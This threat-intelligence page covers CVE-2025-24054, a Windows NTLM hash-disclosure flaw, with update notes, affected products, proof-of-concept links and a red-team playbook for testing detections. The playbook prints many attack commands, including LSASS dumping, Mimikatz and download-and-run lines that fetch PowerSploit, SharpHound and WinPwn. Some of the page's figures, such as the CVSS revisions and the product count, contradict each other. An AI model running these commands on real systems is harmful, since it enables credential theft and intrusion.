CVE-2025-24054
Overview
This vulnerability is an external control of file name or path issue within the Windows NTLM authentication protocol implementation. The root cause lies in improper validation of file path input parameters used during NTLM message processing, allowing manipulation of file path references. The affected component is the Windows NTLM authentication mechanism in Microsoft Windows 10 versions 1507, 1607, and 1809, specifically in both x64 and x86 architectures.
Vulnerability Description
External control of file name or path in Windows NTLM allows an unauthorized attacker to perform spoofing over a network.
Impact
An attacker without prior authentication or user interaction can exploit this vulnerability remotely to spoof network authentication requests by controlling file path parameters in NTLM messages. This enables impersonation of legitimate users or services, potentially allowing unauthorized access to network resources or bypassing authentication controls. The consequence includes unauthorized access to sensitive systems and lateral movement within a network environment, increasing the risk of data breaches or further exploitation.
Solution
Microsoft has released security updates addressing this vulnerability for Windows 10 versions 1507, 1607, and 1809. Administrators should apply the patches provided in the Microsoft Security Response Center advisory available at https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24054. The update supersedes previous versions and mitigates the NTLM path control issue. No specific workarounds are documented; applying the official patch is the recommended remediation step.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability associated with external control of file names or paths in Windows NTLM presents a significant security concern, particularly for systems running various versions of Windows 10 and Windows Server. This issue arises from improper validation of file names or paths, which allows an unauthorized attacker to manipulate these parameters. Consequently, this manipulation can lead to spoofing attacks over a network, where an attacker may impersonate legitimate users or services. The flaw is particularly critical in environments where NTLM is still in use, as it can be exploited to gain unauthorized access to sensitive data or systems.
Attack vectors for this vulnerability are diverse and can be executed through various means. An attacker could leverage social engineering tactics to trick users into executing malicious files that exploit this flaw. Additionally, network-based attacks could be employed, where an attacker sends specially crafted requests to a vulnerable system, thereby controlling the file paths and names used in authentication processes. Exploitation scenarios may include redirecting legitimate authentication requests to malicious servers, allowing attackers to capture credentials or session tokens. The potential for lateral movement within a network is also heightened, as attackers could use compromised credentials to access additional systems and resources.
The real-world impact of this vulnerability is substantial, particularly for organizations that rely heavily on Windows infrastructure. Successful exploitation could lead to unauthorized access to sensitive information, including personal data, intellectual property, and financial records. The business risks associated with such breaches are multifaceted, encompassing reputational damage, regulatory penalties, and financial losses due to remediation efforts and potential lawsuits. Furthermore, the incident response costs and the need for enhanced security measures post-breach can strain organizational resources and divert attention from core business operations.
To effectively detect and mitigate this vulnerability, organizations should adopt a multi-layered security approach. Regularly updating and patching systems is crucial, as software vendors frequently release updates to address known vulnerabilities. Implementing robust monitoring solutions can help detect unusual authentication patterns or file access attempts, allowing for timely intervention. Additionally, organizations should consider transitioning away from NTLM in favor of more secure authentication protocols, such as Kerberos, which offers enhanced security features and mitigates the risk of spoofing attacks. Employee training on recognizing phishing attempts and other social engineering tactics can also serve as a critical line of defense against exploitation.
In summary, the vulnerability related to external control of file names or paths in Windows NTLM poses a significant threat to organizations using affected versions of Windows. The potential for exploitation through various attack vectors highlights the importance of proactive security measures. By understanding the implications of this vulnerability and implementing effective detection and mitigation strategies, organizations can better protect themselves against the risks associated with unauthorized access and data breaches.
Recent developments indicate an expansion in the exploit landscape for CVE-2025-24054, marked by the emergence of multiple new proof-of-concept tools publicly available on GitHub. This proliferation of exploit code has contributed to an upward revision of the CVSS score from 5.4 to 6.5, reflecting a reassessment of the vulnerability’s potential impact and exploitability. However, despite this increased severity rating, our telemetry shows a moderate decline in the Exploit Prediction Scoring System (EPSS) score, suggesting that active exploitation attempts have not proportionally increased and may be stabilizing or diminishing in the near term. Notably, ransomware groups previously linked to this vulnerability remain unconfirmed in their use, and no high-confidence associations have been established, indicating limited adoption by high-profile threat actors at this time. For defenders, the availability of new exploit code lowers the barrier to entry for adversaries, potentially increasing opportunistic attacks and necessitating heightened vigilance. The adjusted CVSS score underscores a heightened risk posture, though the tempered EPSS trend tempers immediate alarm. Overall, the threat level has shifted to a moderately elevated state, driven by greater exploit accessibility but constrained by currently limited exploitation activity.
Update 2 — June 08, 2026
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2025-24054, coinciding with a slight increase in its Exploit Prediction Scoring System (EPSS) value. This uptick reflects growing adversary interest and potentially expanding reconnaissance or exploitation attempts, despite the official CVSS score being revised downward to 5.4. The emergence of multiple new proof-of-concept exploits publicly available on GitHub has likely lowered the technical barrier for threat actors, increasing the risk of opportunistic abuse. Although no confirmed ransomware campaigns have been linked to this vulnerability, the presence of known ransomware groups associated with similar NTLM-based exploits warrants continued monitoring. Collectively, these developments elevate the threat posture from low to moderate, underscoring the need for heightened situational awareness and proactive detection efforts within affected environments.
Update 3 — June 20, 2026
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2025-24054, with telemetry indicating a rapid increase in exploitation attempts and a substantial rise in the Exploit Prediction Scoring System (EPSS) score. This surge reflects growing attacker interest and potentially expanding operational use of publicly available proof-of-concept exploits, which continue to lower the barrier for exploitation. Although ransomware campaigns directly leveraging this vulnerability remain unconfirmed, the presence of ransomware groups historically associated with NTLM-based attacks underscores the potential for future abuse. The elevated EPSS score, now approaching the highest percentile, signals an increased likelihood of exploitation in the near term. Consequently, the threat level for CVE-2025-24054 should be considered elevated from moderate to high, emphasizing the need for defenders to maintain heightened vigilance and prioritize detection capabilities focused on NTLM-related attack vectors.
Update 4 — July 10, 2026
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2025-24054, evidenced by a discernible uptick in exploitation attempts and an expansion of available attack tools. Our telemetry indicates that adversaries are increasingly leveraging newly published proof-of-concept exploits, which lowers the barrier for exploitation and broadens the attacker base. Although ransomware campaigns directly exploiting this vulnerability remain unconfirmed, the persistent interest from threat actors historically linked to NTLM-based attacks, including groups such as bianlian and Magic Hound, suggests a growing operational focus on this vector. The elevated EPSS score, now firmly in the highest percentile, reinforces the heightened likelihood of exploitation attempts in the near term. Collectively, these developments elevate the risk posture of CVE-2025-24054 from medium to high, underscoring an urgent need for defenders to enhance detection and monitoring efforts targeting NTLM spoofing and hash disclosure techniques.
Affected Products (26)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Microsoft | Windows 10 1507 | All |
cpe:2.3:o:microsoft:windows_10_1507:*:*:*:*:*:*:x64:*
|
|
|
Microsoft | Windows 10 1507 | All |
cpe:2.3:o:microsoft:windows_10_1507:*:*:*:*:*:*:x86:*
|
|
|
Microsoft | Windows 10 1607 | All |
cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x64:*
|
|
|
Microsoft | Windows 10 1607 | All |
cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x86:*
|
|
|
Microsoft | Windows 10 1809 | All |
cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x64:*
|
|
|
Microsoft | Windows 10 1809 | All |
cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x86:*
|
|
|
Microsoft | Windows 10 21h2 | All |
cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:arm64:*
|
|
|
Microsoft | Windows 10 21h2 | All |
cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:x64:*
|
|
|
Microsoft | Windows 10 21h2 | All |
cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:x86:*
|
|
|
Microsoft | Windows 10 22h2 | All |
cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:arm64:*
|
|
|
Microsoft | Windows 10 22h2 | All |
cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:x64:*
|
|
|
Microsoft | Windows 10 22h2 | All |
cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:x86:*
|
|
|
Microsoft | Windows 11 22h2 | All |
cpe:2.3:o:microsoft:windows_11_22h2:*:*:*:*:*:*:arm64:*
|
|
|
Microsoft | Windows 11 22h2 | All |
cpe:2.3:o:microsoft:windows_11_22h2:*:*:*:*:*:*:x64:*
|
|
|
Microsoft | Windows 11 23h2 | All |
cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:arm64:*
|
|
|
Microsoft | Windows 11 23h2 | All |
cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:x64:*
|
|
|
Microsoft | Windows 11 24h2 | All |
cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:arm64:*
|
|
|
Microsoft | Windows 11 24h2 | All |
cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:x64:*
|
|
|
Microsoft | Windows Server 2008 | r2 |
cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*
|
|
|
Microsoft | Windows Server 2012 | N/A |
cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
ExploitDB (3)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Windows 10.0.17763.7009 - spoofing vulnerability | beatrizfn | remote | windows | - | View |
| windows 10/11 - NTLM Hash Disclosure Spoofing | beatrizfn | remote | windows | - | View |
| Microsoft - NTLM Hash Disclosure Spoofing (library-ms) | hyp3rlinx | local | windows | - | View |
GitHub PoCs (11)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
helidem/CVE-2025-24054_CVE-2025-24071-PoC
Proof of Concept for the NTLM Hash Leak via .library-ms CVE-2025-24054 / CVE-2025-24071
|
helidem | 21 | 2 | 2025-04-22 | View |
|
basekilll/CVE-2025-24054_PoC
PoC - CVE-2025-24071 / CVE-2025-24054, NTMLv2 hash'leri alınabilen bir vulnerability
|
basekilll | 4 | 2 | 2025-04-18 | View |
|
Untouchable17/CVE-2025-24054
Windows File Explorer Zero Click NTLMv2-SSP Hash Disclosure
|
Untouchable17 | 2 | 1 | 2025-11-23 | View |
|
Yuri08loveElaina/CVE-2025-24054_POC
CVE 2025 24054
|
Yuri08loveElaina | 2 | 1 | 2025-06-14 | View |
|
T0tooro/cve-2025-24054-lab
Blue-team lab: detecting & mitigating CVE-2025-24054 (Windows NTLM hash disclosure) with Sysmon, Wazuh SIEM, and Group P...
|
T0tooro | 0 | 0 | 2026-07-01 | View |
|
Fomovet/cve-2025-24054
POC for CVE-2025-24054
|
Fomovet | 0 | 0 | 2026-06-21 | View |
|
simantchaudhari/CVE-2025-24054-PoC
|
simantchaudhari | 0 | 0 | 2026-05-01 | View |
|
Wind010/CVE-2025-24054_PoC
A proof of concept for CVE-2025-24054/CVE-2025-24071
|
Wind010 | 0 | 0 | 2025-11-09 | View |
|
SecurityLayer404/CVE-2025-24054-24071---Metasploit-Module
Módulo de Metasploit para explotar CVE-2025-24054 (ex 24071). Exploit de filtración NTLM integrado en Metasploit para ve...
|
SecurityLayer404 | 0 | 0 | 2026-04-01 | View |
|
S4mma3l/CVE-2025-24054
|
S4mma3l | 0 | 0 | 2025-05-01 | View |
|
moften/CVE-2025-24054
Vulnerabilidad NTLM (CVE-2025-24054) explotada para robo de hashes
|
moften | 0 | 0 | 2025-05-19 | View |
Threat Feed
13 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AmmyyAdmin, AnyDesk, Atera (552 known victims)
Ransomware group known to exploit this vulnerability. Tools: AdFind, AnyDesk, Atera, BITSAdmin, Backstab (Process Explorer driver) (523 known victims)
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
76 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
"#{dumpert_exe}"
#{xordump_exe} -out #{output_file} -x 0x41
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
"#{venv_path}\Scripts\pypykatz" live lsa
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
$Action = New-ScheduledTaskAction -Execute "cmd.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTaskModifed -InputObject $object
$NewAction = New-ScheduledTaskAction -Execute "Notepad.exe"
Set-ScheduledTask "AtomicTaskModifed" -Action $NewAction
$Action = New-ScheduledTaskAction -Execute "calc.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTask -InputObject $object
"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" \\#{target} -accepteula -s "cmd.exe"
"PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" \\#{target} add #{task_name} "cmd.exe" "/c #{task_command}" #{user_name} logon
reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f
schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))" /sc daily /st #{time}
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "compmgmt.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's open the Computer Management console now...
compmgmt.msc
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "eventvwr.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's run the schedule task ...
schtasks /Run /TN "EventViewerBypass"
schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"
SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler"
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershell.exe -e #{obfuscated_code}
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-Expression "#{adrecon_path}"
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
net user administrator /domain
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
net user /domain
net group /domain
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
query user /SERVER:#{computer_name}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Get-ADComputer #{hostname} -Properties *
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (8)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-24054 |
| msrc.microsoft.com |
GitHub CVE
vendor-advisory
patch
|
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24054 |
| seclists.org |
NVD API
Mailing List
|
http://seclists.org/fulldisclosure/2025/Apr/28 |
| exploit-db.com |
NVD API
Exploit
Third Party Advisory
VDB Entry
|
https://www.exploit-db.com/exploits/52478 |
| exploit-db.com |
NVD API
Exploit
Third Party Advisory
VDB Entry
|
https://www.exploit-db.com/exploits/52480 |
| vicarius.io |
NVD API
Exploit
Third Party Advisory
|
https://www.vicarius.io/vsociety/posts/cve-2025-24054-spoofing-vulnerability-in-windows-ntlm-by-microsoft-detection-script |
| vicarius.io |
NVD API
Mitigation
Third Party Advisory
|
https://www.vicarius.io/vsociety/posts/cve-2025-24054-spoofing-vulnerability-in-windows-ntlm-by-microsoft-mitigation-script |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-24054 |